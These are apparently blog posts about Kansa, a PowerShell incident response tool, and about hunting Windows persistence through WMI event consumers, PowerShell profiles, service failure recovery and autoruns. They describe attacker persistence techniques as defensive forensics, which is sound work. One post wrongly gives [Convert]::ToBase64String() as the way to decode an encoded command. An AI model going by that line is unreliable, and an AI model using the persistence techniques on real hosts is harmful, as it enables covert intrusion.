<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtGi68WNkiklXINPlUILrybEtUi2wNwKTdzDTBTHDDgvtrd3EOpsOFLKZvJuEwVjaDxqQhRYriHSQ3Rd_XYENU3eWVHtLaRqvi7K8pzTG8fkMKzVSsYE5SgpvYhFvGdEdlsgcPzTfDP4Y/s1600/AutorunscDeep.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtGi68WNkiklXINPlUILrybEtUi2wNwKTdzDTBTHDDgvtrd3EOpsOFLKZvJuEwVjaDxqQhRYriHSQ3Rd_XYENU3eWVHtLaRqvi7K8pzTG8fkMKzVSsYE5SgpvYhFvGdEdlsgcPzTfDP4Y/s1600/AutorunscDeep.png" height="282" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2: Output of Get-AutorunscDeep.ps1 for the same PowerShell ASEP (Click to enlarge)</td></tr>
</tbody></table>
Note the red marks in Figure 2 and apologies, I'm not a graphic artist. Get-AutorunscDeep.ps1 has added an MD5 hash for the Get-AutorunscDeep.ps1 script that the PowerShell executable in the above Scheduled Task is calling. You can also see the ShannonEntropy value for PowerShell.exe, another feature of Get-AutorunscDeep.ps1's output. Now consider the visibility this gives you if you have the same ASEP script deployed across thousands of hosts. Use Kansa's Get-AutorunscDeep.ps1 collector, in conjunction with Sysinternal's Autorunsc.exe, and you'll quickly be able to find versions of scripts that have been modified.davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-37828716880754447052014-07-13T21:25:00.003-07:002014-07-13T22:26:05.514-07:00Kansa: Passing arguments to collector modules<div style="text-align: left;">
In my <a href="http://trustedsignal.blogspot.com/2014/07/kansa-automating-analysis.html" target="_blank">previous post</a> on Kansa's automated analysis, I mentioned there was another improvement I made to the framework that I would cover in a future post. I thought at that time, that Kansa was at a point where I could go into some details about the new feature, but as it turns out, it wasn't quite ready. </div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Previously, some of Kansa's collector modules would need to be edited or customized prior to being run. Disk\Get-File.ps1, for example, was one that could acquire a specific file from target machines, but users would have to edit the collector to specify the file they wanted to acquire. Obviously that was less than ideal, so I did some work that would allow users to specify those kinds of things via command line arguments. In my limited testing, this worked... but, my testing was limited.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
This week I had a <a href="https://github.com/davehull/Kansa/pull/40" target="_blank">pull request</a> <span style="font-family: inherit;">submitted</span> by <a href="https://twitter.com/z4ns4tsu" target="_blank">@z4ns4tsu</a> for a collector module called Get-FilesByHash.ps1 that would allow investigators to take a cryptographic hash (MD5, SHA1, etc.) of a known suspect file, then search for files with that same hash across many machines in the environment. The module was the first that would take multiple arguments, the search path, the hash and the hash type; this is where Kansa had an issue. It couldn't pass multiple arguments to collectors, but after a couple nights of work, now it can.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
I also added a few arguments to Get-FilesByHash.ps1, including a file extension regex so the script doesn't hash every single file looking for matches, instead, it will only hash those files with extensions that match the provided file extension regex, the default regex is \.(dll|exe|ps1|sys)$, this greatly reduces the number of files that will be hashed. I also added two more arguments that limit the files that will be hashed based on minimum and maximum file size in bytes.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Here's a command line example showing how this module can be used:</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<span style="font-family: "Courier New", Courier, monospace;">.\Kansa.ps1 -ModulePath ".\Modules\Disk\Get-FilesByHash.ps1 BF93A2F9901E9B3DFCA8A7982F4A9868,MD5,C:\Windows\System32,\.exe$" -target localhost -Verbose</span></div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<br /></div>
<span style="font-family: inherit;"></span><div style="text-align: left;">
<span style="font-family: inherit;">Above Get-FilesByHash.ps1 will search for any files with the MD5 hash of BF93A2F9901E9B3DFCA8A7982F4A9868, in or below the C:\Windows\System32 path and ending with an extension of .exe., Notice that the arguments to Get-FilesByHash.ps1 are not named parameters. Named parameters are not supported for remoting, so they must be positional also note that they are comma separated and the whole module and arguments are quoted.</span></div>
<span style="font-family: inherit;">
<div style="text-align: left;">
</div>
<div style="text-align: left;">
As with other modules, you can use the .\Modules\Modules.conf file to pass arguments to Get-FilesByHash.ps1 (or any other module that takes arguments) via the conf file itself. Here's the entry for the module above taken from the conf file:</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<span style="font-family: "Courier New", Courier, monospace;">Disk\Get-FilesByHash.ps1 BF93A2F9901E9B3DFCA8A7982F4A9868,MD5,C:\Windows\System32</span></div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Note the absence of quotes in the configuration file, and I've also omitted the regex extension argument.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Adding the ability to pass parameters to modules meant I could remove several collectors from Kansa that were written to acquire specific event logs, each one collecting a specific log file, instead, now Kansa has one collector written to generically collect any Windows event log and the specific log is simply passed as an argument. Here's the relevant section of the .\Modules\Modules.conf file:</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<span style="font-family: "Courier New", Courier, monospace;">Log\Get-LogWinEvent.ps1 Security<br />Log\Get-LogWinEvent.ps1 Microsoft-Windows-Application-Experience/Program-Inventory<br />Log\Get-LogWinEvent.ps1 Microsoft-Windows-Application-Experience/Program-Telemetry<br />Log\Get-LogWinEvent.ps1 Microsoft-Windows-AppLocker/EXE and DLL<br />Log\Get-LogWinEvent.ps1 Microsoft-Windows-AppLocker/MSI and Script<br />Log\Get-LogWinEvent.ps1 Microsoft-Windows-AppLocker/Packaged app-Deployment<br />Log\Get-LogWinEvent.ps1 Microsoft-Windows-Shell-Core/Operational<br />Log\Get-LogWinEvent.ps1 Microsoft-Windows-TerminalServices-LocalSessionManager/Operational<br />Log\Get-LogWinEvent.ps1 Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational</span></div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Above we have a single collector, Log\Get-LogWinEvent.ps1, that replaced nine collectors because it accepts an argument specifying which log to collect.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
As you can see, being able to pass command line arguments to collectors is a big benefit, just be mindful that they are positional, not named parameters and as a result, if you want to accept all the default arguments but the last one, you still have to specify every argument, supplying the default values for every argument except the one you want to modify.</div>
</span><br />
You can find more information about Kansa and the latest release at <a href="https://github.com/davehull/Kansa/releases">https://github.com/davehull/Kansa/releases</a>.davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-8795604213929969762014-07-04T14:51:00.001-07:002014-07-04T14:51:08.691-07:00Kansa: Automating Analysis<a href="https://github.com/davehull/Kansa" target="_blank">Kansa</a>, the PowerShell based incident response framework, was written from the start to automate acquisition of data from thousands of hosts, but a mountain of collected data is not worth bits without analysis, thus analysis has been part of the framework from almost the beginning as may be seen here in this <a href="https://github.com/davehull/Kansa/commit/2f5beb44e508b158b666881cd88d66e0af5a6e0e#diff-739e6d2a73723ec7b1919fa5a51f9b07" target="_blank">commit from 2014-04-18</a>.<br />
<br />
Data collection has been configurable via the Modules.conf text file since the beginning and the project has been packaged with a default Modules.conf file with the order of volatility applied. Users could edit the file, comment and uncomment lines to disable and enable modules, customizing data collection. <br />
<br />
After Kansa completed its collection, users could cd into the newly created output directory and then into the specific module directory and run the analysis script of their choosing to derive some intelligence from the collected data. For example, a user might run Kansa's Get-Autorunsc.ps1 collector to gather Autoruns data from a hundred hosts that should have identical or very similar configurations.<br />
<br />
Following the data collection, they could cd into the new output directory's Autorunsc subdirectory, then run<br />
<br />
<code>Get-ASEPImagePathLaunchStringMD5Stack.ps1</code><br />
<br />
which would return a listing of Autoruns aggregated by path to executable, command line arguments and MD5 hash of the executable or script all in ascending order, so any outliers would be at the top of the list and these entries may warrant further investigation.<br />
<br />
This was all well and good, but with more than 30 analysis scripts, analysis of the collected data was becoming cumbersome. It was begging for automation. So, I added it.<br />
<br />
There is now an Analysis.conf file in the Analysis folder that works in much the same way as the Modules\Modules.conf configuration file. Every analysis script has an entry in the configuration file and you can edit the file and comment out the scripts you don't want to run or uncomment the ones you want to run. Then when you run Kansa, simply add the -Analysis flag and after all the data is collected, Kansa will run each analysis script for you and save the output to a new folder under the time stamped output folder called AnalysisReports.<br />
<br />
Below is a sample listing:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxzMWiT4zuAfX2peNgOPCVI7cRmb1MrGUZHGZow0i_kGIOJWBtRjV-CMPMEgMh3WyeiFduzhTxovn0CSGLEiDBk33sxchyphenhyphenjtu1vVEjrM6Ri40vma9SWo_gEvCAitKGbc-loCm4ULTYnbU/s1600/AnalysisOutput.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxzMWiT4zuAfX2peNgOPCVI7cRmb1MrGUZHGZow0i_kGIOJWBtRjV-CMPMEgMh3WyeiFduzhTxovn0CSGLEiDBk33sxchyphenhyphenjtu1vVEjrM6Ri40vma9SWo_gEvCAitKGbc-loCm4ULTYnbU/s1600/AnalysisOutput.png" height="456" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click for original size image</td></tr>
</tbody></table>
<span id="goog_1708624214">In the top directory listing of the output directory, you can see the normal output file structure, one folder per module, this was obviously a very limited data collection with Autorunsc, File, Netstat and PrefetchListing modules being used. Error.Log contains information about errors encountered during runtime. What's new here is the AnalysisReports directory.</span><br />
<br />
The bottom directory listing shows the contents of the AnalysisReports path. Each of these are TSV files containing summary data of the collected data with the file names reflecting the name of the script that produced the data set. And the beauty of this is, it's fully automated when you run Kansa with the -Analysis flag and you've configured the Analysis\Analysis.conf file.<br />
<br />
I've made some other improvements to Kansa in the last couple weeks, but I'll save that for the next post. For now, I wanted to share the automated analysis piece. I'm pretty psyched about it because it's a big time-saver and it puts Kansa in a position where it can easily produce alerts based on the presence of a quality or quantity on which an analysis script is written to trigger.davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-5623385966135034852014-06-17T23:59:00.000-07:002014-06-23T07:47:27.400-07:00Kansa: Get-LogUserAssist.ps1Tonight I pushed the latest collector to Kansa, <a href="https://github.com/davehull/Kansa/blob/master/Modules/Log/Get-LogUserAssist.ps1" target="_blank">Get-LogUserAssist.ps1</a>. This is probably the most complicated collector I've written for Kansa. It has several moving parts and there were some obstacles to overcome.<br />
<br />
As with most Kansa modules, you can run it stand-alone on your localhost, or through Kansa to collect data from thousands of hosts via Windows Remote Management. To run it against your local system, you should be able to download it from the above link, unblock it either through Explorer by browsing to it, right-clicking on it and unchecking the unblock checkbox under properties somewhere, I don't GUI enough. Or you can download it, open a Powershell prompt to the location where you've downloaded it and do:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">ls Get-LogUserAssist.ps1 | unblock-file</span><br />
<br />
The above may assume you have PS v3, I'm not sure when unblock-file came into being. You should upgrade to PS v3, if you haven't already as it has more whizbang.<br />
<br />
Another option is to use Sysinternals Streams.exe -d Get-LogUserAssist.ps1, but I digress.<br />
<br />
Here's an example of me running this locally on my laptop:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQDf9j-0RF6Eof4hNf_GspLnebtVOuqh3s9va3qvc4WTuU1CcCJf3Xus66akUxT_aiJC8yUkZSrJcr5QX3cIbYfjFas88s9Fm5vnYDy70kp-dXUYhepEIyaSSQxtFUFWl4-C-FRpxalpo/s1600/localrun.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQDf9j-0RF6Eof4hNf_GspLnebtVOuqh3s9va3qvc4WTuU1CcCJf3Xus66akUxT_aiJC8yUkZSrJcr5QX3cIbYfjFas88s9Fm5vnYDy70kp-dXUYhepEIyaSSQxtFUFWl4-C-FRpxalpo/s1600/localrun.PNG" height="283" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click for larger image</td></tr>
</tbody></table>
When run locally, the script returns Powershell objects. The output directive for this script, tells Kansa to save the output as tab separated values, making for easy import into a database or quick analysis with Logparser. An analysis script for this output is on the <a href="https://github.com/davehull/Kansa/issues?direction=asc&sort=created&state=open" target="_blank">Kansa issues list</a> as an enhancement.<br />
<br />
If you run this locally and want to massage the output to TSV, at your Powershell prompt, you could do:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">PS> Get-LogUserAssist.ps1 | ConvertTo-CSV -Delimiter "`t" -NoTypeInformation</span><br />
<br />
I don't care for quoted TSV, so I'd go a step further adding:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">| % { $_ -replace "`"" }</span><br />
<br />
to the above and why not write it out to a file that you can load into Excel or a database or query with Logparser? To do that, simply add the below to the above:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">| Set-Content LocalhostUserAssist.tsv</span><br />
<br />
But you don't have to do TSV. You could drop the -Delimiter arg above and default to CSV or instead of using ConvertTo-CSV, use Export-CliXML and you've got XML output for those of you who want a more challenging and slower analysis experience. Zing!<br />
<br />
One thing I'm not clear on and may have to research, is why so many of my "counts" are coming up as zero. Did Windows 8 stop incrementing run counts?<br />
<br />
This collector starts by enumerating all of the local profiles on the target, then looks in each profile path for an ntuser.dat file. If it finds one, it will try and load that hive. If the hive loads, the script looks for UserAssist and parses it, if found. If UserAssist is not found, it moves on to the next user. If the script was unable to load the hive, it assumes that's because the user is currently logged on and the file is locked, so at that point, it looks in HKEY_USERS for all the loaded hives by SID, resolves those SIDs to usernames and compares them to the username associated with the locked profile. When it finds a match, it looks for UserAssist in the matching HKEY_USERS key by SID. One thing that occurs to me now, based on something I heard <a href="https://twitter.com/forensic_matt" target="_blank">@forensic_matt</a> say at this year's <a href="http://www.sans.org/event/dfir-summit-2014" target="_blank">SANS DFIR Summit,</a> if the user's account is renamed, this match will likely fail. Something to add to the Kansa issues list. Save for that edge case, this script will pull UserAssist key data for all user accounts on a running system.<br />
<br />
And since it's a Kansa module, you can run it across thousands of hosts easily.<br />
<br />
I hope someone finds it useful.<br />
<br />
[Update] You may be wondering, "Why is this module under Modules\Log, the Registry is not a log file?"<br />
<br />
As Harlan Carvey has rightly pointed out, the Registry sometimes is a log file and in the case of UserAssist, it most certainly is. Hence, I placed it under Modules\Log. You're free to move it elsewhere on your own set up.<br />
<br />
[Update 20140623] Confirmed for renamed accounts the module was not able to resolve a loaded SID to an account name, but I've fixed this bug. The script now returns the user account name and the user profile path, so spotting renamed accounts is simple. Here's an example where the Local Administrator account has been renamed to Gomer.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZQUdBK0xxBs2SUOaLN_wlT6JzWjRAbi3ikkjjui4PYV6JruWCObEA0E9Ogp-uEhx41DlBxGFACvf-0JEs0Jj5FwSD4loCbq2u0bu6-Yis5vqa1tB5A_nLOHYczKmfMleprFbmoCepq8Q/s1600/renamedacct.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZQUdBK0xxBs2SUOaLN_wlT6JzWjRAbi3ikkjjui4PYV6JruWCObEA0E9Ogp-uEhx41DlBxGFACvf-0JEs0Jj5FwSD4loCbq2u0bu6-Yis5vqa1tB5A_nLOHYczKmfMleprFbmoCepq8Q/s1600/renamedacct.PNG" height="62" width="400" /></a></div>
davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-84885293915436113142014-05-17T22:38:00.000-07:002014-05-18T15:06:44.003-07:00Kansa: Powershell profiles potentially hazardousOn the very day I published my previous post, <a href="http://trustedsignal.blogspot.com/2014/05/kansa-collecting-wmi-event-consumer.html" target="_blank">Kansa: Collecting WMI Event Consumer backdoors,</a> Mark Russinovich <a href="https://twitter.com/markrussinovich/status/466324363965632513" target="_blank">announced the release of a new version of Autoruns that collects WMI related ASEPs</a>. I had a chance to play around with it on a machine with a WMI Event Consumer, Event Filter and Filter-to-Consumer Binding configured and indeed, Autoruns now picks up the Event Consumers. I still recommend using Kansa's Get-WMIEvtFilter.ps1 and Get-WMIFltConBind.ps1 collector modules to grab the other two essential pieces that make Event Consumer backdoors possible. The Event Filter is the piece that will tell you what triggers the Event Consumer.<br />
<br />
In this post I want to cover another "auto start extension point" or ASEP and it happens to be another that is not covered by Autoruns, yet. It also happens to be specific to Powershell. <a href="http://technet.microsoft.com/en-us/library/ee692764.aspx" target="_blank">The Windows Powershell Profile</a> is a script that runs, if present, each time a user or SYSTEM opens a Powershell shell. It's akin to a .bash_profile or similar shell profile on *nix systems.<br />
<br />
Adversaries can modify an existing Powershell profile for either a user or the default system profile, planting code enabling them to maintain persistence or perform any task that Powershell is capable of given the context of the script (non-administrator users obviously being less capable than administrators or SYSTEM).<br />
<br />
Kansa's Get-PSProfiles.ps1 collector will enumerate local accounts on remote systems and check each of them for Powershell profiles. Where Powershell profiles exist, Get-PSProfiles will collect them all in a zip file (it will also check for and collect the default Powershell profile). The zip file will then be sent back to the host where Kansa was run.<br />
<br />
Powershell profiles can be located in a few different locations. For user profiles, they are in:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">$env:userprofile\Documents\WindowsPowershell\Microsoft.Powershell_profile.ps1</span><br />
<br />
And the default system profile is in:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">$env:windir\System32\WindowsPowershell\v1.0\Microsoft.Powershell_profile.ps1</span><br />
<span style="font-family: Courier New;"></span><br />
User Powershell profiles on XP systems are in a slightly different path and Kansa will not acquire them.<br />
<br />
Unfortunately, there's no quick way of analyzing the collected profile scripts for malicious capabilities, at least not that I'm aware of. Analysts will have to spend time reviewing profiles for suspect code. This is a good time to mention that any ASEP script, not just Powershell profiles could be modified by adversaries to perform nefarious actions.<br />
<br />
This is another painful reminder of the asymmetry of information security. Adversaries have many places to hide malicious bits and may only need one (or none, if they have a big enough key ring of credentials). Incident responders, depending on the nature of the incident, may have to review every known ASEP.<br />
<br />
Enjoy the code review and happy hunting!davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-85005375914167613242014-05-13T06:01:00.000-07:002014-05-17T21:10:27.291-07:00Kansa: Collecting WMI Event Consumer backdoorsIn my previous post, <a href="http://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html" target="_blank">Kansa: Service related collectors and analysis</a>, I discussed the Windows Service related collectors and analysis capabilities in Kansa and noted that some of the collected data is not currently collected by Sysinternals' Autoruns.<br />
<br />
Today I'll cover another persistence mechanism that Kansa collects, which is not currently collected by Autoruns; namely <a href="http://msdn.microsoft.com/en-us/library/aa392396(v=vs.85).aspx" target="_blank">WMI Event Consumers</a>. That link tells us "Event consumers are applications or scripts that request notification of events, and then perform tasks when specific events occur."<br />
[Update: 2014-05-13] Mark Russinovich released a new version of Autoruns today that reports WMI information. I have not tested it yet. It will be interesting to see if it only reports data form Event Consumers and not the Event Filter, which tells what the trigger is.<br />
<br />
For an event consumer to work, three elements are required:<br />
<ul>
<li>An Event Consumer -- this is the piece that performs some action</li>
<li>An Event Filter -- an event query watching for defined activity -- this triggers the consumer</li>
<li>A Filter-to-Consumer Binding -- this links the filter to the consumer</li>
</ul>
In my experience, WMI Event Consumers are not commonly used. So in many situations collecting the data and simply reviewing file sizes can tell you if something is worth investigating further. For example, I recently collected event consumer data from a few thousand hosts. Running the following Powershell command was enough to find which host contained a backdoor running from an event consumer:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">ls *wmievtconsmr.xml | sort length -Descending | more</span><br />
<br />
The output of that command follows, see if you can determine which host had the backdoor installed:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOdjFIyQPqc_8CbnFAAMMxwqwaTgaIAYWjidshMMJH7-mexFarxLaBrgsjmoCXPOxB9bEBKBtJG677FuU-l2EH33J1RCjFe1RHN5zrNuMCkVVcr22bgN9B5NF7vjzAn9phUup3W0VxyVY/s1600/FileSize2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOdjFIyQPqc_8CbnFAAMMxwqwaTgaIAYWjidshMMJH7-mexFarxLaBrgsjmoCXPOxB9bEBKBtJG677FuU-l2EH33J1RCjFe1RHN5zrNuMCkVVcr22bgN9B5NF7vjzAn9phUup3W0VxyVY/s1600/FileSize2.PNG" height="253" width="320" /></a></div>
If you guessed DFWBOSSWEE01, congratulations, you may have the skills necessary to find WMI Event Consumer backdoors.<br />
<br />
So what's in this file? Since it was collected with Kansa's Get-WMIEvtConsumer collector, which specifies its output should be written to an XML file, we can either open the XML file in a suitable editor or use the Powershell cmdlet Import-Clixml to read the file into a variable and examine the contents via the following commands:<br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">$data = Import-Clixml .\DFWBOSSWEE01_wmievtconsmr.xml</span><br />
<span style="font-family: "Courier New", Courier, monospace;">$data | more</span><br />
<br />
This command returns output like the following:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaigvpdPKMndmqcXQRHior2_MQzCw0kJ85iCvaCqAT-h04m8W2mJHEkop_pOcCiB69K3uFNFZHINbz3BJb9xBIsEUzgW1eYuPPWbsbj9XEJsBm3l21PHm_B1nPwMKbMeKL1Mze505vr0w/s1600/wmibackdoor2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaigvpdPKMndmqcXQRHior2_MQzCw0kJ85iCvaCqAT-h04m8W2mJHEkop_pOcCiB69K3uFNFZHINbz3BJb9xBIsEUzgW1eYuPPWbsbj9XEJsBm3l21PHm_B1nPwMKbMeKL1Mze505vr0w/s1600/wmibackdoor2.png" height="640" width="500" /></a></div>
The most interesting bits above are those in the "CommandLineTemplate" property, which I've redacted a bit, but you can see there's a call to Powershell.exe and a long base 64 encoded string, which in this case was a Powershell encoded command, in essence, a script. We can decode that script via <br />
<br />
<span style="font-family: "Courier New", Courier, monospace;">[Convert]::ToBase64String()</span><br />
<span style="font-family: inherit;"></span><br />
Doing so would reveal that when this WMI Event Consumer is triggered, it connects to a remote site and downloads another script and runs it.<br />
<br />
So how often is it triggered? What triggers it? To answer those questions, you'll have to review the data Kansa collected via Get-WMIEvtFilter.ps1. A consumer by itself is harmless, but if there's an Event Filter and a Filter-to-Consumer binding, then you've got all the ingredients needed for a WMI Event Consumer based backdoor.davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-17894575184797286082014-05-03T01:44:00.000-07:002014-05-03T01:44:00.488-07:00Kansa: Service related collectors and analysisIn my previous post on <a href="http://trustedsignal.blogspot.com/2014/04/kansa-autoruns-data-and-analysis.html" target="_blank">Kansa's Autoruns collectors and analysis scripts</a>, I mentioned that the Get-Aurounsc.ps1 collector relies on Sysinternals' Autorunsc.exe to collect data on all of the Autostart Extension Points (ASEPs) that it has catalogued. Autorunsc and its GUI sibling, Autoruns, are great tools, but they are not comprehensive, there are other ASEPs that they don't catch, so Kansa includes a few additional modules that aim to collect additional ASEPs and additional data about ASEPs.<br />
<br />
<strong>Get-SvcAll.ps1</strong><br />
Runs Get-WMIObject win32_service to collect details about all services. Output is saved as XML. Some of this same data is collected by Get-Autorunsc.ps1 above, however, this will pull additional properties for each service with some of them being specific to the type of service. If a service is running, you'll get its <strong>process id</strong> and the <strong>context it runs under (Local System, Local Service, etc.)</strong>. There's even an <strong>InstallDate</strong> property, which is awesome, however, in my experience, it's never populated, which sucks.<br />
<br />
For analysis of the data collected by Get-SvcAll.ps1, there are two very basic frequency analysis or stacking scripts as of this writing. They are Get-SvcAllStack.ps1 and Get-SvcStartNameStack.ps1. The former does its frequency analysis based on Service "<strong>Captions</strong>" and <strong>Pathnames</strong>. The Captions are the short friendly names you see when you look at the Services running on your system while the <strong>Pathnames include the path to the binary and any arguments</strong>. Here's an example from two systems where the Application Identity service has two different sets of command line arguments:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAdVIaMA49EZ8FmrwINGpB9Ac4pyEthnnrjslTfpIAXvN_Nh0DEFjNiaw7DfXJElb_f7KSM9OnKRzHhOF9cjc8U_VAeUHRnL6jw7r7_awlNo6ECDU5zVuUTgAtPUxbJoXC9N91IpGYKyM/s1600/Get-SvcAll.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAdVIaMA49EZ8FmrwINGpB9Ac4pyEthnnrjslTfpIAXvN_Nh0DEFjNiaw7DfXJElb_f7KSM9OnKRzHhOF9cjc8U_VAeUHRnL6jw7r7_awlNo6ECDU5zVuUTgAtPUxbJoXC9N91IpGYKyM/s1600/Get-SvcAll.jpg" height="17" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click for larger image</td></tr>
</tbody></table>
Stacking by these properties across many hosts shows investigators services that may have the same Caption, but different binaries and arguments. This same kind of analysis is available in the Autoruns stacking scripts with the added benefit of stacking by file hash (e.g. MD5).<br />
<br />
Get-SvcStartNameStack.ps1 stacks by Caption and <strong>StartName</strong>, the latter of which turns out to be the name of the account the service runs under.<br />
<br />
Another Service analysis script, but not a stacker, is Get-SvcAllRunningAuto.ps1, which pulls the list of Services that were in a running state or set to start automatically when the Get-SvcAll.ps1 collector ran on the targets.<br />
<h4>
ASEPs not collected by Autorunsc:</h4>
As I mentioned above, Sysinternals' Autoruns and Autorunsc executables collect all the ASEPs they know to collect, but that is not the universe of ASEPs.<br />
<br />
Windows Services can be configured to recover from failures. In my experience, restarting the service is the most common recovery option, but one option that adversaries can use is the "Run a Program" option as shown below:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXsCSzrgrHgHD3NYbjL_uKzjxpF1uWe9VazAWc-HP-Qnxx8AZidHngzQWERxZXrjRP4zo9wWhQ1-Yk5Ye80aULDxfHKZadAYKTkVwSsOxAYeRrZoSGkHOQls40sVx5_iZqOpdrzFk4kuU/s1600/svcfail2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXsCSzrgrHgHD3NYbjL_uKzjxpF1uWe9VazAWc-HP-Qnxx8AZidHngzQWERxZXrjRP4zo9wWhQ1-Yk5Ye80aULDxfHKZadAYKTkVwSsOxAYeRrZoSGkHOQls40sVx5_iZqOpdrzFk4kuU/s1600/svcfail2.png" height="400" width="352" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click for larger image</td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
</div>
In the screen shot above, the Application Identity service is configured with a failure recovery response that will run a program called ServiceRecovery.exe from C:\ProgramData\Microsoft\ with the command line argument -L 443. This is a persistence mechanism that Autorunsc won't capture.<br />
<strong></strong><br />
Kansa's <strong>Get-SvcFail.ps1</strong> collector will collect service failure recovery information from all services. Kansa includes a few analysis scripts that will stack the service failure recovery data, but the most useful one is <strong>Get-SvcFailCmdLine.ps1</strong>, which returns the frequency count of the program and command line parameters from all the collected service failure information. The image below shows this data from a few thousand systems:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmdvIuVHO_JKw-lX2888w97XGLYltIzssqe-VBlKaD1Yq4GAsgY5jQ9Ulu0W_ywtDQ9HeFWsNUr1nQx0uhR7jcVE1nfMRl4T5GWbxmBd3URboTMCy43YOWOe1VE7wN0q_1F_bNMPUkb9A/s1600/SvcFailCmdLine.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmdvIuVHO_JKw-lX2888w97XGLYltIzssqe-VBlKaD1Yq4GAsgY5jQ9Ulu0W_ywtDQ9HeFWsNUr1nQx0uhR7jcVE1nfMRl4T5GWbxmBd3URboTMCy43YOWOe1VE7wN0q_1F_bNMPUkb9A/s1600/SvcFailCmdLine.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click for larger image</td></tr>
</tbody></table>
In the example there are 129769 Service Failure entries, 75088 of them have the same program and command line arguments configured as a recovery option. Seems unlikely this is malicious.<br />
<br />
In another smaller data set, the following data was returned:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
